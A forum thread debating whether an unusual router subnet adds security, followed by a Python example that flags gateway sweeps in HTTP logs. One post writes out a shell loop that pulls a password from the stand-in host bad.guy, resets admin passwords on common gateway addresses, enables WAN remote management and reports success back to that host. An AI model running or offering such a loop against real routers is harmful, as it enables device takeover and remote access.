If someone is on the inside of your network you have much bigger issues. Having a random subnet won’t do anything as they can just look at the arp/ndp tables.
That’s what I said though, it only protects you from the very most basic of mindless scripts. Obviously ARP/NDP makes it pointless for anything more complicated than…
newpass="$(curl "https://bad.guy/get_pass_for_pub_ip")"
for a in '192.168.1.1' '192.168.0.1' '10.0.0.1'; do
    curl -q "http://${a}/reset_password.cgi?&password=password&new_password=${newpass}" 2>/dev/null && \
    curl -q "http://${a}/remote_management.cgi?&password=${newpass}&wan_enable=1" && \
    curl -q "https://bad.guy/success?addr=${a}"
done
…completely pointless. If it’s someone inside your network, you need more.
No worries. It is technically another layer in the “Swiss cheese” model, but it certainly is more holes than cheese. I think it falls into the “can’t hurt, might help” category.
That’s not how networking works
Yeah I don’t really understand your argument
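A defender's view of the loop quoted in the thread, as an added example that is not part of the original posts: one client sending the same request path to several private-range addresses within seconds is easy to flag from outbound HTTP logs, whichever subnet the router actually uses. The log format, function names, window and threshold are assumptions, and the sample lines are constructed.

```python
# Added example: flag a client that sends the same request path to several
# private-range IP literals within a short window (the loop's pattern).
# Log format and names are assumptions; SAMPLE_LOG is constructed data.
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

SAMPLE_LOG = """\
2024-05-01T10:00:00 192.168.50.23 GET http://192.168.1.1/reset_password.cgi
2024-05-01T10:00:01 192.168.50.23 GET http://192.168.0.1/reset_password.cgi
2024-05-01T10:00:02 192.168.50.23 GET http://10.0.0.1/reset_password.cgi
2024-05-01T10:05:00 192.168.50.40 GET http://192.168.50.1/index.html
2024-05-01T10:06:00 192.168.50.40 GET http://example.com/index.html
"""

def parse(line):
    """Split 'timestamp client method url' into the fields we correlate on."""
    ts, client, _method, url = line.split(maxsplit=3)
    parts = urlsplit(url)
    return datetime.fromisoformat(ts), client, parts.hostname, parts.path

def is_private_literal(host):
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:  # a hostname, not an IP literal
        return False

def find_gateway_sweeps(log_text, window=timedelta(seconds=10), min_hosts=2):
    hits = defaultdict(list)  # (client, path) -> [(time, destination host)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, host, path = parse(line)
        if host and is_private_literal(host):
            hits[(client, path)].append((ts, host))
    alerts = []
    for (client, path), events in sorted(hits.items()):
        events.sort()
        for i, (start, _) in enumerate(events):
            # Distinct private destinations reached within the window.
            hosts = {h for t, h in events[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                alerts.append((client, path, sorted(hosts)))
                break
    return alerts

if __name__ == "__main__":
    for alert in find_gateway_sweeps(SAMPLE_LOG):
        print(alert)
```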